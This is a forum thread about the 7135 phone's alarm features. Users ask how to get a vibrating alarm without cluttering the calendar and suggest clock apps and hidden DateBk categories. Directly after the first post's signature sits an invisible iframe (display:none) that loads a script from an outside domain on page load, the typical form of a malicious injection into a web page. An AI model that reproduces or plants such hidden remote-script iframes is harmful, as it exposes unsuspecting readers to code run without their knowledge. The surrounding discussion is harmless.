+ Reply to Thread

Thread: Vibrate alarm?

Vibrate alarm?

Does anyone know of a alarm program that I can use to get the phone to vibrate at a given time? Or do you know of some configuration which will get the 7135 to do this, other than making appointments in the databook?

For example, at 10am each day, I want my phone to vibrate but I don't want an appointment set cluttering up my calendar to do this.

Thanks in advance.

-GadgetPro<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Vibrate alarm?

Originally posted by Gadgetpro
    Does anyone know of a alarm program that I can use to get the phone to vibrate at a given time? Or do you know of some configuration which will get the 7135 to do this, other than making appointments in the databook?

For example, at 10am each day, I want my phone to vibrate but I don't want an appointment set cluttering up my calendar to do this.

Thanks in advance.

-GadgetPro
    I think most of the clock apps will let you do this. I use maClock and I have it set to ring at 7:00 AM Mondays though Fridays. It is set to ring, but it could just as easily be set to vibrate.
    Dave

Re: Vibrate alarm?

Do you have DateBk 4 or 5?
    You can put appointments into a hidden category. Voila, out of sight, out of mind (until they ring of course).

Originally posted by Gadgetpro

Thanks in advance.

-GadgetPro

Does the 7135 even have a vibrate alarm? It's not listed in the general prefs as a choice...

Same question. I just got my 7135 and been going throught the features. One that I've been looking for is for the vibra alarm. I have it set for vibration on incoming calls, but can find it for alarms. (I thought that this would be like the Palm M115). If anyone knows how/where to set it up, it would be neat.

And I was just playing with the normal alarms. I have the general prefs set for high alarm volume, set an alarm in the datebook, and closed the phone. Looks like the red light flashes, but no beep.

So two questions now:

1. Is there any way to have the alarm make a noise when the phone is closed?

2. Or can a datebook alarm vibrate the phone?

A third question is more about the alarm manager in general. I have a Clie that's OS 5, but I'm pretty sure my 505 had the feature that if you didn't clear alarms, the next time you'd turn it on it would list all the alarms that had passed, and you could clear them then. Thought that was the new Alarm manager in Palm OS 4, but the 7135 doesn't do it. Don't have the 505 in front of me to check, but anyone know the answer?

Steve